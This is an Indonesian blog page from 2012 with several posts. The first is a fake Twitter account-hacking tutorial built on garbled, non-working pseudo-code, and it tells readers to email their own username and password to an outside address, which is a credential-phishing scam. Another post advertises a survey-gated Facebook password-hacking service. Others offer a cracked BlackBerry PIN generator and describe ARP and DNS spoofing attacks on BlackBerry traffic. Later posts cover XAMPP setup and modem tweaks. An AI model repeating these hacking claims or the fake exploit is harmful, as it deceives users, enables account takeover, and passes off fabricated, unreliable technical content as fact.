Selasa, 06 Maret 2012

Hacks Tweeter Sesuka-mu...


Twitter has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account.

If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.

So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned Twitter uses something similar to an email service to contact their databases.

But as usual, everything isn't as easy as it seems. For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password), luckily for us Twitter is so poorly programmed they also allow you to use a friends/followers account to verify your own (it's a glitch in the "Mutual Friends/Followers" service where they authenticate accounts by checking if the associated friends/followers email is related to the 'victims' account), in other words, if the person you want to get the login information from is following you on Twitter and your following them...you can use your own account to verify theirs (by confusing the database into thinking we are checking if you both mutually follow each other rather than the true act of reseting their password and getting them to send it to us) and get their login email and password sent to you...but the victim must be following you and you them.
HOW TO DO IT
1) First off you will need to get your username and the victims username, how do you do this?

Go to the victims twitter profile and look at your browsers address bar, at the end of all the address you should see something like this: (I have used a red arrow to point it out)



Write it down somewhere as you will need to use it a bit further down, once that is done you may continue to step 2.
2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.

Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.
3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the twitter username of the victim and the friend authentication login information. I will give you step by step examples by trying the exploit code of my friend Sarah's account as the victim, see what parts you have to edit and with what:



1. Should be the victims username.
2. Should be your twitter login username to verify your the victims follower/friend.
3. Should be your password so the database can authentic you really are mutually following each other with the victim.

When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email we will have to use a special Subject so the database knows how to read it in programming language.

Go to your email address and Compose a new email to twittersupport@techie.com which is twitters customer service email for forgotten passwords, in the Subject copy and paste the code below highlighted in gray:
$[search_database = $find user+id= "VICTIMSUSERNAME", '%verification+user+gender' = }"F"{ begin_search();


Once you have edited the Subject and entered the email address, your Composed email should look like the screenshot below, I will numerate each item: 

 

1. The email address of the twitter database's forgotten password customer service.
2. This is where you insert the victims username.
3. This is where you insert the victims gender (as mentioned above the twitter database is devided in a male section and female), put an M inside the quotes if they are a male or a F if they are a female.
5) After you have correctly written the To: and Subject: sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email. Now all you have to do is click Send and wait for the database to send you back it's reply with the information.

It should take from 12-24 hours depending on the traffic twitter has that day, this is a sample of the email response you'll receive:

THE EXPLOIT CODE
twt_select_db("find", $linkID) or die(twt_database_error()); $resultID = twt_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(twt_database_error()); $num_rows = db_num_rows($resultID); $row = twitter_fetch_array($resultID); $user_id = $row[0];

if ($user_id == "PUT_USERNAME_HERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that Username.
}
else {
// print "We're sorry, your follower does not appear to be in our database."

$passwordfromdb = $row[0];
$find userID = (%follower_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "YOUR_USERNAME_HERE"; (%follower_vulnerability_match%)
#user password = "YOURPASSWORDHERE"; (%follower_vulnerability_matchk%)
$follower_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email

session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

}
elseif (empty($email_address)) {
   echo $empty_fields_message;
function decrypt userID password() {
     $salt = "abchefghjkmnpqrstuvwxyz0123456789";
     srand((double)microtime()*1000000);
     $i = 0;
     while ($i <= 7) {
             $num = decrypt() % 33;
             $tmp = substr($salt, $num, 1);
             $pass = $pass . $tmp;
             $i++;
    }
    return $pass;
  }

mail($email_address, $subject, $message, "Twitter Password Reset Confirmation


}
/end$

Thanks to : Angelfire.com

Hacks FB Sesuka Mu...


Hack Facebook Accounts For Free

Hack Facebook
You can hack Facebook passwords for free with this hacking tool. We have developed a professional service for you to hack facebook accounts online with no download required. We are the number one, most popular website with over 10,000 passwords successfully hacked to date. Our method is completely safe, legal and works instantly with no download needed. Simply enter their profile link into the box below and click on the hack button.

How To Hack Facebook Password


  

 



Hack facebook account passwords within just a few minutes. The time it takes depends on how complex and long their password is. Our exploit uses a brute force method to hack the password, which means we run thousands of potential combinations through the login page to see if it's correct. If successful, you will be notified and requested to enter an authorization code. Please click the link and complete a quick free survey which will then provide you with the code afterwards. Their Facebook password will then be revealed in the text box in plain text. Copy and paste this password into Facebook along with their username or email address to access their account.
Our service is completely free and is able to hack facebook passwords. We have an incredible success rate by using a mathematically certain method known as brute force. This website has been developed and funded by a group of coders and hackers who have decided to provide their service to the public. The demand to hack Facebook has grown exponentially in recent years, yet it's still difficult to find working methods. Most downloads contain viruses which usually steal your own password, so by using an online version such as ours is completely safe. Your victim will never know you have access to their account as we get their original password for you so you can login as well as them.
We hope you appreciate our site and that it works for you too. It may not look like much, but it does take a lot of time and effort to maintain the system - a large amount of development has gone into the back-end server which anonymously connects to Facebook and does all the hacking. So far, we have had a high uptime track record with no issues, however, things do go wrong so feel free to contact us if you have any issues, we are more than happy to help.
Perhatian : Di Gunakan Secara bener. Kalo Ga ngerti Bahasanya Artikan Menggunakan kamus Milik OM.Google :)

Selasa, 21 Februari 2012

Blackberry Pin & Imei Generator Cracked™


Silahkan bagi yang Memerlukan, jangan sungkan2 untuk diunduh 



 Attached Files

HACK PIN BB By Fatah Dudutz™

Jika kita amati bahwa perkembangan sebuah telepon genggam yang sering kita sebut sebagai BLACKBERRY, ternyata dibalik kemewahannya perangkat yang satu ini bisa juga diserang (attack) dengan menggunakan jaringan wireless yang sudah disematkan pada generasi terbaru Blackberry. Dan serangan yang secara umum serangan dilakukan adalah via TCP/IP dengan menggunakan metode “arpspoof dan dnsspoof”.
Karena menurut beberapa ahli bahwa salah satu kelemahan sekaligus kekuatan Blackberry adalah adanya feature “proxying” yang hampir ada pada setiap device dari RIM ini, yang mana hampir secara keseluruhan layananan Blackberry baik itu e-mail (pushmail), browsing baik dari dan menuju perangkat Blackberry kita melalui server Blackberry (untuk kawasan ASIA PASIFIK) server berada ap.blackberry.com

Untuk dapat melakukan capture data melalui switches network, slah satu cara yang bisa dilakukan adalah dengan “meracuni/meng-inject” tabel ARP pada perangkat Blackberry yang dikenal sebagai ARP Spoofing yang bisa juga kita sebut sebagai metode ARP poisoning atau ARP poison routing. Tabel ARP inilah yang digunakan perangkat Blackberry kita untuk berkomunikasi dengan netwok device yang lain atau kira2 begini penjelasannya [i][i]“The principle of ARP spoofing is to send fake, or “spoofed”, ARP messages to an Ethernet LAN. Generally, the aim is to associate the “attacker’s” MAC address with the IP address of another node (such as the default gateway). Any traffic meant for that IP sent to the attacker instead. The attacker could the choose to forward the traffic to the actual default gateway (passive sniffing) or modify the data before forwading it (man-in-the-middle-attack). The attacker could also launch a denial-of-service attack againts a victim by associating a nonexistent MAC address to the IP address ofthe victim’s default gateway.

Sebagai contoh, ketika seseorang mencoba untuk mengkoneksikan Blackberrynya ke salah satu wireless access point (WAP) hingga terhubung ke dalam jaringan, dan selanjutnya dengan menggunakan teknik serangn ARP spoofing guna meracuni tabel dalam ARP (internal) yang dimiliki oleh Blackberry, sehingga Blackberry yang telah diracuni berikut dengan server akan mengirim seluruh data dari dan menuju Blackberry yang diracuni melewati Blackberry “attacker” terlebih dulu.
Jika diilustrasikan kira sebagai berikut :
 dengan metode ini ternyata bahwa seluruh aliran data bisa diterima oleh “attacker” terlebih dulu melewati komputer yang telah diatur sebelumnya, dengan menggunakan tool’s Cain Abel yang mana applikasi ini juga secara otomatis menciptakan sertifikat palsu (fake) yang nantinya akan memalsukan sertifikat asli yang digunakan oleh ap.blackberry.com akan tetapi juga harus dingat bahwa seluruh koneksi akan di=”proxy” oleh rcp.ap.blackberry.com dan komunikasi akan menggunakan SSL :






Kemudian attacker dapat meng-capture traffic jaringan untuk analisa lebih lanjut, disamping itu biasanya attacker juga menggunakan program “Whiteshark” untuk menampung data yang akan di dump menggunakan aplikasi lain yang disebut juga SSLdump (SSL traffic decrypt process), metode ini digunakan untuk mengubah data tersebut menjadi “cleartext” dengan menggunakan sertifikat palsu tentunya, berikut sertifikat palsu (fake certificate)

2.DNS spoofing
Metode kedua ini dilakukan dengan memanfaatkan topologi (peta/mapping) network model “proxying” yang digunakan Blackberry terhadap rcp.ap.blackberry.com. Dengan cara maka seluruh perangkat Blackberry yang mengunakan jaringan server regional (Asia Pasific) akan mengira bahwa server (WAP=wireless access point) yang telah diset oleh attacker sebagai server regional BIS “DNS Spoofing is the art of making a DNS to point to an another IP that it would be supposed to point to”

da beberapa langkah yang harus dilakukan oleh attacker pertama-tama dengan melakukan spoofing DNS entri dari server DNS (dengan menggunakan WAP, maka akan attacker akan masuk ke server dan menambahkan entri sebagai berikut rcp.ap.blackberry.com yang kemudian akan dikonfigurasi oleh komputer yang telah diset sebelumnya untuk melakukan “capture data, edit, serta manipulasi data”
Setelah berhasil menambahkan rcp.ap.blackberry.com maka dengan kata lain seluruh blackberry yang terkoneksi ke access point dan DNS tersebut akan dengan sukarela masuk ke dalam komputer attacker dan attacker akan mengkonfigurasi antara blackbery dengan server menggunakan SSL. Akan tetapi jika kita jeli maka jika kita melakukan browsing sementara blackberry kita sudah di “HacK” sebenarnya blackberry kita akan memberikan peringatan seperti ini :



Disini attacker juga harus menggunakan “Stunnel” untuk menghubungkan komputer attcker dengan pengguna blackberry serta server rcp.ap.blackberry.com ini dimaksudkan agar aktifitas blackberry yang di “hack” tetap berlangsung dengan menggunakan SSL tentunya dengan menggunakan sertifikat palsu yang sudah dibuat sebelumnya.
Biasanya Attacker juga menggunakan Blackbag untuk menghubungkan pengguna blackberry ke server sesungguhnya yang telah diubah kedalam “plaintext” kira-kira seperti ini :

CARA MENGAMANKAN BLACKBERRY ANDA?

Cara pertama : Ada baiknya kita sebagai pengguna Blackberry untuk selalu waspada jika mendapatkan pesan “certificate error” meskipun itu dinyatakan berasal dari rcp.ap.blackberry.com, dan yang pasti jika terhubung dengan jaringan wireless yang telah anda yakini memang aman.
Cara kedua : Jangan pernah beli Blackberry (ini adalah cara yang paling aman, wakwakwak tapi mana bisa ntar dibilang ketinggalan jaman lagi)

Sabtu, 18 Februari 2012

Daftar Kecepatan Internet di seluruh negara Termasuk Indonesia™

Besarnya pengaruh (sisi positif) internet membuat negara-negara maju berlomba memperbesar infrastruktur, jaringan dan teknologi internet. Bagi pemerintah bersama stakeholder (provider/operator) negara-negara maju, mereka telah memperbesar kecepatan internet hingga angka fantastis bila dibanding dengan negara seperti Indonesia. Adalah negara Korea Selatan yang menjadi negara dengan akses internet tercepat, yang disusul Jepang.

Berikut 12 Negara (Wilayah) dengan kecepatan Internet tertinggi
Rank Negara Kecepatan Akses
1 Korea Selatan 21,71 Mb/s
2 Jepang 16.00 Mb/s
3 Aland Island 15.02 Mb/s
4 Lithuania 13.44 Mb/s
5 Latvia 13.35 Mb/s
6 Swedia 13.26 Mb/s
7 Romania 12.85 Mb/s
8 Belanda 12.32 Mb/s
9 Bulgaria 12.02 Mb/s
10 Republik Moldova 10.00 Mb/s
11 Hong Kong (China) 9.52 Mb/s
12 Slovakia 8.92 Mb/s

28 Amerika Serikat 5.1 Mb/s (Update)

138 Indonesia 1.21 Mb/s

Sumber : Speedtest (Update 14 Okt 2009)

Tabel diatas menunjukkan kecepatan rata-rata akses internet yang berhasil diolah oleh speedtest.net. Dari kecepatan tersebut, maka waktu rata-rata untuk mengakses sebuah situs di Korea atau Jepang hanya dibutuh waktu hitungan detik. Hal yang berbeda dengan Indonesia, yang membutuh waktu puluhan detik, bahkan puluhan menit.

Membuat Website™

ebelum kita membuat internet yang online , ada
baiknya kita coba buat web server lokal di komputer
kita sendiri. Disini kita bebas kutak - katik tanpa ada biaya
online
 , sewa hosting dan beli domain.
Caranya yaitu
kita install applikasi web server di komputer kita
sendiri. Ada banyak applikasi yang bisa dijadikan sebagai Server
Website
 di komputer kita. Baik itu web server di Windows XP
ataupun OS lain seperti linux ( Ubuntu , Suse , dll).
Software
aplikasi web server yang pernah saya dengar dan paling
top adalah :

  • Internet Information Service
    (IIS)
    . IIS ini biasanya sebagai bawaan dari windows. Pada
    umumnya digunakan pada windows 2000 server dan windows
    2003
    . IIS ini menggunakan bahasa ASP dan
    banyak dipadukan dengan database MSSQL. Bagi anda yang
    jago vb script , maka ASP ini sangat cocok buat anda.
  • Apache. Ini biasanya untuk website dengan bahasa PHP
    dan dipadukan dengan database MySQL. Software yang
    satu ini gratis.

Karena
pertimbangan uang dll maka banyak orang memakai Apache , PHP
& MySQL
 untuk membuat server website lokal. Dan juga di
hostingan , rata-rata sudah menyediakan fasilitas PHP &
MySQL
 tersebut. Karena itu kita fokuskan topik kita ke web
server
 ini saja.
Kita bisa download Apache ,
PHP dan MySql
 dari websitenya dan install satu -satu di
komputer kita untuk membuat server website lokal. Tapi
ini lebih ribet. Ada beberapa pengembang yang sudah menyediakan satu
installer untuk paket
 tersebut ( Apache , PHP dan MySql ) ,
seperti :

  • XAMPP
  • WAMPP
  • DONGKRAK

Yang
saya pakai di komputer saya adalah XAMPP (basic package)
version 1.6.7 untuk Windows
. XAMPP ini cukup bagus dan fitur
juga cukup lengkap. Berikut fitur - fitur dari XAMPP :

  1. Apache
    2.2.9
  2. MySQL 5.0.51b
  3. PHP 5.2.6 + PHP 4.4.9 +
    PEAR
  4. PHP-Switch win32 1.0 (please use the
    "php-switch.bat")
  5. XAMPP Control Version 2.5 from
    www.nat32.com
  6. XAMPP Security 1.0
  7. SQLite
    2.8.15
  8. OpenSSL 0.9.8h
  9. phpMyAdmin 2.11.7
  10. ADOdb 4.98
  11. Mercury Mail Transport System v4.52
  12. FileZilla FTP Server 0.9.25
  13. Webalizer 2.01-10
  14. Zend Optimizer 3.3.0
  15. eAccelerator 0.9.5.3 for PHP
    5.2.6 (comment out in the php.ini)

Sebagian fungsi
fitur ini saya juga belum begitu mengerti. Tapi yang penting adalah ada
Apache , PHP dan MySql , dimana ketiga inilah yang
paling kita butuhkan untuk membuat lokal web server di
komputer kita.
Cara menginstall XAMPP ini juga mudah. Berikut cara
cara install XAPP
 menjadi web server di komputer kita.

  1. Download XAMPP di servernya ( http://www.apachefriends.org/en/xampp-windows.html)
  2. Double klik pada file yang baru dodownload untuk unpack installer.
    Pilih folder pada level tertinggi untuk tempat unpack file tersebut
    seperti E:\xampp atau C:\xampp atau
    folder yang lainnya. Ingat jangan gunakan folder flash disk dan
    sejenisnya.
  3. Buka folder tempat anda unpack
    sebelumnya.
  4. Double klik setup_xampp.bat
    untuk install XAMPP
  5. Cari dan double klik file xampp-control.exe
    untuk membuka setting XAMPP.
  6. Disini anda bisa
    start dan stop Apache , MySQL
     server dan fitur lain. Untuk
    latihan ini saya kira anda cukup start Apache , MySQL saja.
  7. Buka browser anda dan ketik http://127.0.0.1 atau http://localhost
    maka server website lokal anda akan terbuka.

Sampai
disini anda sudah berhasil membuat komputer kita menjadi web server.
Anda bisa menggunakan phpMyAdmin untuk membuat database.

Copy kan web page anda ke ?:\xampp\htdocs
atau buat subfolder dari htdocs untuk website anda. Contoh : Jika anda
buat subfolder "coba" maka dari browser anda akan
diakses dengan http://localhost/coba

Thanks To : Fatah Dudutz 

Percepat Koneksi Internet Tanpa Software™

* Buka menu Control Panel > Network Connections. Kemudian klik kanan pada icon koneksi modem > pilih Properties, seperti gambar di bawah.

* Pada jendela Properties, klik tombol Configure, maka akan muncul jendela Modem Configuration seperti di bawah.

* Perhatikan gambar di atas. Untuk meningkatkan kecepatan modem, pada bagian “Maximum speed (bps)” ubahlah nilainya di atas nilai asli dari modem anda. Misalnya untuk modem dengan kemampuan transfer data 153Kbps (seperti yang ane gunakan) bisanya nilai aslinya 115200, sehingga dapat ditingkatkan menjadi 230400. Atau jika agan merasa yakin bisa agan maksimalkan lagi nilainya menjadi yang tertinggi yaitu 921600 seperti pada gambar di atas, tetapi dengan resiko yang juga agan tanggung sendiri, karena sama saja memaksa modem untuk “kerja rodi”  . Kebetulan ane juga melakukan hal yang sama, karena sudah siap menaggung resiko :P dan selama ini belum terjadi apa-apa pada modem, mukin modemnya termasuk produk bagus hehe  .
* Masih berkaitan dengan gambar di atas, untuk mengontrol aliran data dan error pada modem, beri tanda cek pada “Enable hardware flow control” dan “Enable modem error control“. Kemudian akhiri dengan klik tombol OK untuk menerapkan konfigurasi.


 

sesudah
 

sumpah ane kaget. tapi kok uploadnya nurun 

satu lagi gan